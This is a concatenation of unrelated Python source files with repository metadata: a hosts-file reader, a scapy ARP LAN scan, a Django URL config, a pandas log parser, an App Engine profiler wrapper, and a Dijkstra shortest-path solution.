newhosts = ""
linenumber = 0
with open("/etc/hosts", 'r') as f:
for line in f:
newhosts += line
if linenumber == 0:
newhosts += "127.0.0.1 localhost\n"
print(newhosts) | [
"robert.reihs@gmail.com"
] | robert.reihs@gmail.com |
b4d28d4ac9d76360e7ff38057add343ac62aabd8 | aeb0fcc60ad1349a4bb06b5c93628a483178c542 | /tools/csk_test/__init__.py | 833a5f06c5ff381ab10f2acfe0c54334f5cabe8b | [] | no_license | jacke121/YOLOv3_PyTorch | c535ffd52ca2b2b8c0885da76d180b96b333c257 | ad0459c6524ce5edefcc6886985ac843c0abef48 | refs/heads/master | 2020-03-21T23:35:26.729893 | 2018-09-07T10:50:18 | 2018-09-07T10:50:18 | 139,196,231 | 8 | 0 | null | 2018-06-29T21:06:47 | 2018-06-29T21:06:47 | null | UTF-8 | Python | false | false | 335 | py | # !/usr/bin/env python2.7
# -*- coding: utf-8 -*-
from scapy.all import srp, Ether, ARP, conf
lan = '192.168.25.1/24'
ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF") / ARP(pdst=lan), timeout=1)
for snd, rcv in ans:
cur_mac = rcv.sprintf("%Ether.src%")
cur_ip = rcv.sprintf("%ARP.psrc%")
print(cur_mac + ' - ' + cur_ip)
| [
"lbg@example.com"
] | lbg@example.com |
c72cbcd440074e6bc7d2e8a2a8c11f0f5a79f2e0 | f458d3f77cf7cb1ebe1da43aa8b2de64b9a2a828 | /ddblog/ddblog/urls.py | 814bc9265417403ab027d3041a9a82fefa9bf76e | [] | no_license | 18372689867/bo_ke | c4715011cda284b1fb9586faf6857d2556b73fe2 | 9e159ebe7bab1899b73258b3c2763ca3d2b044bf | refs/heads/master | 2023-03-08T07:54:53.798940 | 2021-02-23T12:24:11 | 2021-02-23T12:24:11 | 341,542,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,620 | py | """ddblog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from . import views
from user import views as user_views
from btoken import views as btoken_views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('test_cors', views.test_cors),
path('test_cors_server', views.test_cors_server),
# 博客项目的路由设置
# CBV: 模型模块名.视图类.as_view()
# as_view()的作用根据请求方法,在视图类中查找对应的
# 类的方法,找到后,调用即可;找不到,直接报异常 405
path('v1/users', user_views.UserView.as_view()),
path('v1/users/', include('user.urls')),
path('v1/tokens', btoken_views.TokenView.as_view()),
path('v1/topics/',include('topic.urls')),
path('v1/messages/',include('message.urls')),
]
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
| [
"1671129@qq.com"
] | 1671129@qq.com |
6c01e0c87f1231c1a696e1b6cbdbd868b04e2a06 | 011a750fae8ade67f726a9749e05cc4afb8e360d | /text_file_analyser/test/main.py | 141c4ce62d4e23028bccb531ba11cf934d5e6550 | [] | no_license | MartinCarufel/PycharmProjects | c7e50b66a24d4a216b7a217192fcd446f5324d9f | aaa6c95b3e2e6525586fb6a03d1c9d484065899b | refs/heads/master | 2023-07-05T22:40:38.650892 | 2023-06-26T13:55:13 | 2023-06-26T13:55:13 | 150,859,642 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | from text_file_analyser import Text_File_analyser
import pandas as pd
def main():
tf = Text_File_analyser("usb_stress_testIO-04-000979.log")
csv_data = tf.data_spliter("\| Date :", " +")
df = pd.DataFrame(csv_data)
df = df[[3, 4]]
print(df)
def main2():
# Creating the dataframe
df = pd.DataFrame({"A": [12, 4, 5, None, 1],
"B": [7, 2, 54, 3, None],
"C": [20, 16, 11, 3, 8],
"D": [14, 3, None, 2, 6]})
print(df)
# skip the Na values while finding the maximum
print(df.max(axis=1, skipna=True))
if __name__ == '__main__':
main() | [
"maccam6@gmail.com"
] | maccam6@gmail.com |
f0438fb43a911298fba48e71620bc3f5ff15ba8b | c16ab2c9c675bdbca43a4603a14106790d9e7da2 | /lib/gae_mini_profiler/appstats_profiler.py | d1e30d4d9a70e975ccedc29a5068b4e0987559b9 | [
"MIT"
] | permissive | y2bishop2y/microengine | 7e7e8b5852188fcceb9559f9d8d339bf6257a0d7 | 2322fdce0718a06bdc0332682e8ef9e393f8e7af | refs/heads/master | 2021-01-01T18:38:17.250888 | 2013-03-20T08:21:53 | 2013-03-20T08:22:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,136 | py | """RPC profiler that uses appstats to track, time, and log all RPC events.
This is just a simple wrapper for appstats with result formatting. See
https://developers.google.com/appengine/docs/python/tools/appstats for more.
"""
import logging
from pprint import pformat
from google.appengine.ext.appstats import recording
from lib.gae_mini_profiler import util, cleanup, unformatter
class Profile(object):
"""Profiler that wraps appstats for programmatic access and reporting."""
def __init__(self):
# Configure AppStats output, keeping a high level of request
# content so we can detect dupe RPCs more accurately
recording.config.MAX_REPR = 750
# Each request has its own internal appstats recorder
self.recorder = None
def results(self):
"""Return appstats results in a dictionary for template context."""
if not self.recorder:
# If appstats fails to initialize for any reason, return an empty
# set of results.
logging.warn("Missing recorder for appstats profiler.")
return {
"calls": [],
"total_time": 0,
}
total_call_count = 0
total_time = 0
calls = []
service_totals_dict = {}
likely_dupes = False
end_offset_last = 0
requests_set = set()
appstats_key = long(self.recorder.start_timestamp * 1000)
for trace in self.recorder.traces:
total_call_count += 1
total_time += trace.duration_milliseconds()
# Don't accumulate total RPC time for traces that overlap asynchronously
if trace.start_offset_milliseconds() < end_offset_last:
total_time -= (end_offset_last - trace.start_offset_milliseconds())
end_offset_last = trace.start_offset_milliseconds() + trace.duration_milliseconds()
service_prefix = trace.service_call_name()
if "." in service_prefix:
service_prefix = service_prefix[:service_prefix.find(".")]
if service_prefix not in service_totals_dict:
service_totals_dict[service_prefix] = {
"total_call_count": 0,
"total_time": 0,
"total_misses": 0,
}
service_totals_dict[service_prefix]["total_call_count"] += 1
service_totals_dict[service_prefix]["total_time"] += trace.duration_milliseconds()
stack_frames_desc = []
for frame in trace.call_stack_list():
stack_frames_desc.append("%s:%s %s" %
(util.short_rpc_file_fmt(frame.class_or_file_name()),
frame.line_number(),
frame.function_name()))
request = trace.request_data_summary()
response = trace.response_data_summary()
likely_dupe = request in requests_set
likely_dupes = likely_dupes or likely_dupe
requests_set.add(request)
request_short = request_pretty = None
response_short = response_pretty = None
miss = 0
try:
request_object = unformatter.unformat(request)
response_object = unformatter.unformat(response)
request_short, response_short, miss = cleanup.cleanup(request_object, response_object)
request_pretty = pformat(request_object)
response_pretty = pformat(response_object)
except Exception, e:
logging.warning("Prettifying RPC calls failed.\n%s\nRequest: %s\nResponse: %s",
e, request, response, exc_info=True)
service_totals_dict[service_prefix]["total_misses"] += miss
calls.append({
"service": trace.service_call_name(),
"start_offset": util.milliseconds_fmt(trace.start_offset_milliseconds()),
"total_time": util.milliseconds_fmt(trace.duration_milliseconds()),
"request": request_pretty or request,
"response": response_pretty or response,
"request_short": request_short or cleanup.truncate(request),
"response_short": response_short or cleanup.truncate(response),
"stack_frames_desc": stack_frames_desc,
"likely_dupe": likely_dupe,
})
service_totals = []
for service_prefix in service_totals_dict:
service_totals.append({
"service_prefix": service_prefix,
"total_call_count": service_totals_dict[service_prefix]["total_call_count"],
"total_misses": service_totals_dict[service_prefix]["total_misses"],
"total_time": util.milliseconds_fmt(service_totals_dict[service_prefix]["total_time"]),
})
service_totals = sorted(service_totals, reverse=True, key=lambda service_total: float(service_total["total_time"]))
return {
"total_call_count": total_call_count,
"total_time": util.milliseconds_fmt(total_time),
"calls": calls,
"service_totals": service_totals,
"likely_dupes": likely_dupes,
"appstats_key": appstats_key,
}
def wrap(self, app):
"""Wrap and return a WSGI application with appstats recording enabled.
Args:
app: existing WSGI application to be wrapped
Returns:
new WSGI application that will run the original app with appstats
enabled.
"""
def wrapped_appstats_app(environ, start_response):
# Use this wrapper to grab the app stats recorder for RequestStats.save()
if recording.recorder_proxy.has_recorder_for_current_request():
self.recorder = recording.recorder_proxy.get_for_current_request()
return app(environ, start_response)
return recording.appstats_wsgi_middleware(wrapped_appstats_app)
| [
"eberenbaum@okta.com"
] | eberenbaum@okta.com |
9471cea9b5d59083fe068b87504590f4027f45eb | ad8b30544480ba1e5f5b1cb2dec2aa77a644e8d2 | /BOJ/1238_파티.py | 47e4a42bd4b524d433bb52d123cba305548dc8c0 | [] | no_license | hyunwoojeong123/Algorithm | 79abc82d944ca60342a7f8b6fc44fac20ac55123 | 0baaf3222fbbec699ffbec5d4cc680067cf293fb | refs/heads/master | 2023-07-10T18:28:51.934005 | 2021-08-18T01:51:23 | 2021-08-18T01:51:23 | 284,403,698 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,098 | py | import sys,heapq
INF = sys.maxsize
input = sys.stdin.readline
def dij(x):
# d 배열을 INF 로 전부 준다
d = [INF]*n
# heap에다가 [0, 출발점] 을 넣는다.
heapq.heappush(heap, [0,x])
# d[출발점] = 0
d[x] = 0
# heap 다 빌 때까지 반복
while heap:
# w,x 는 현 위치까지의 거리와 현 위치
w,x = heapq.heappop(heap)
# nw,nx 는 x에서 nx까지 거리, x와 연결된 애
for nw,nx in a[x]:
# nw 에 w를 더해줌 : 출발점에서 nx 까지 거리
nw += w
# 이게 기존에 기록해둔 값보다 작으면
if nw < d[nx]:
# 거리 갱신하고 heap에다가 걔네 넣음.
d[nx] = nw
heapq.heappush(heap,[nw,nx])
return d
n,m,t = map(int, input().split())
a = [[]*n for _ in range(n)]
heap = []
for i in range(m):
x,y,w = map(int, input().split())
a[x-1].append([w,y-1])
ans = [0]*n
for i in range(n):
d = dij(i)
ans[i] += d[t-1]
d = dij(t-1)
ans[i] -= d[i]
print(max(ans)) | [
"hw2621@daum.net"
] | hw2621@daum.net |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.